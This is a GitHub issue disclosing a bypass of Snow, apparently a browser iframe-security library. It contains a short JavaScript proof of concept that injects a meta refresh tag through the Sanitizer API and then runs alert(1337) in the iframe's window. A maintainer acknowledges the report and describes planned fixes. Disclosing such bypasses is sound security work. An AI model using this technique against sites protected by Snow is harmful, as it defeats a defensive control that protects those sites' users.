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Snow can be bypassed with meta and the HTML sanitizer #151

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hackvertor opened this issue Oct 16, 2023 · 1 comment
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Snow can be bypassed with meta and the HTML sanitizer #151

hackvertor opened this issue Oct 16, 2023 · 1 comment

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@hackvertor
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This is similar #142 but I use the Sanitizer API to inject the meta tag

i=document.createElement('iframe');
i.src=123;
i.name='xyz';
counter=0;
i.onload=x=>{
i.contentDocument.body.setHTML('<meta http-equiv="refresh" content="0">',
{sanitizer:new Sanitizer({allowElements: [ "meta" ],allowAttributes:{"http-equiv":["meta"],"content":["meta"]}})});
counter++;
if(counter>1){
  i.onload=null;
}
};
setInterval(x=>xyz.alert(1337),0);
document.body.append(i);
@naugtur
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naugtur commented Nov 2, 2023

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.

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